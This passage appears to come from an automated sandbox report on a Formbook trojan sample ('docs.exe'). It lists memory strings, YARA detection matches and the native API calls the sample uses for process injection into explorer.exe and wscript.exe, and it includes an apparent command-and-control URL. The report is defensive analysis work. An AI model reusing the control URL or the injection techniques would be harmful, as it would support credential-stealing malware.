          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.come
          Source: explorer.exe, 00000006.00000002.4606649141.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comEMd
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000006.00000003.3075948830.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4603707608.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2158468861.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727477538.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/e
          Source: explorer.exe, 00000006.00000003.3077968513.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2987216711.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2163588037.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4606870784.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2986355937.000000000C06D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comM
          Source: explorer.exe, 00000006.00000002.4608809096.000000001079F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4586831233.000000000480C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.0000000004FEF000.00000004.10000000.00040000.00000000.sdmp, docs.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
          Source: explorer.exe, 00000006.00000002.4608809096.0000000010C8F000.00000004.80000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4590765350.00000000054DF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.j88.travel/c24t/?I6=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
          Source: explorer.exe, 00000006.00000002.4600082648.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3077028884.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2154066848.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727707156.0000000007414000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed

          E-Banking Fraud

          Source: Yara match | File source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.docs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.docs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4586188983.0000000002F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4587647793.00000000048D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2160886912.000000000480A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: docs.exe PID: 4620, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR | Matched rule: Semi-Auto-generated - file ironshell.php.txt | Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
          Source: Process Memory Space: wscript.exe PID: 2224, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A330 NtCreateFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A3E0 NtReadFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A460 NtClose
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A510 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A2EA NtCreateFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A32A NtCreateFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A3DA NtReadFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A45E NtClose
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041A50A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82B60 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F84340 NtSetContextThread
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F84650 NtSuspendThread
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82AF0 NtWriteFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82AB0 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82BE0 NtQueryValueKey
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82BA0 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82B80 NtQueryInformationFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82CF0 NtOpenProcess
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82CC0 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82C60 NtCreateKey
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82C00 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82DB0 NtEnumerateKey
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82D00 NtSetInformationFile
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82EE0 NtQueueApcThread
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82E30 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82FA0 NtQuerySection
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F82F60 NtCreateProcessEx
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F83090 NtSetValueKey
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F83010 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F835C0 NtCreateMutant
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F839B0 NtGetContextThread
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F83D70 NtOpenThread
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F83D10 NtOpenProcessToken
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE94232 NtCreateFile
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE95E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE95E0A NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2C60 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2BE0 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD35C0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD4650 NtSuspendThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD4340 NtSetContextThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD2B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD3090 NtSetValueKey
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD3010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD3D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD3D70 NtOpenThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04AD39B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A3E0 NtReadFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A330 NtCreateFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A460 NtClose
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A510 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A2EA NtCreateFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A3DA NtReadFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A32A NtCreateFile
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A45E NtClose
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_02A1A50A NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_049AA036 NtQueryInformationProcess, NtSuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_049A9BAF NtCreateSection, NtMapViewOfSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_049AA042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_049A9BB2 NtCreateSection, NtMapViewOfSection, NtMapViewOfSection
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_013BE12C
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548C3F8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548B228
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548D2E0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548FCE0
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548FA88
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_05489579
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_05489588
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F469
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F478
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F608
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F618
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548E1F9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548E008
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548C3E8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548E208
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548B218
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548A210
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548A220
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548D2CA
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548EDC8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548EDD8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548FCD1
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548DFF8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548B980
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548B990
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F868
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548F878
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548FA79
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00401030
